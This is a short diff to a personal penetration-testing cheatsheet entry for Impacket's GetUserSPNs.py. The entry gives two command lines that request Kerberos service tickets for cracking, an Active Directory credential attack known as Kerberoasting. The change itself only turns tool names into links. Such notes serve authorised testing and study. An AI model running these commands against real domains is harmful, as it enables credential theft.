7RU7H/Archive/Tools/Impacket/Impacket-Cheatsheet.md

 ## GetUserSPNs.py

 This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
-Output is compatible with JtR and HashCat.
+Output is compatible with [[John-The-Ripper-Cheatsheet]] and [[Hashcat-Cheatsheet]] .
 ```bash
 GetUserSPNs.py -dc-ip $ip $domain.local/$user -request # provide a password
 GetUserSPNs.py -dc-ip $dc-ip $spn.info/$notanadmin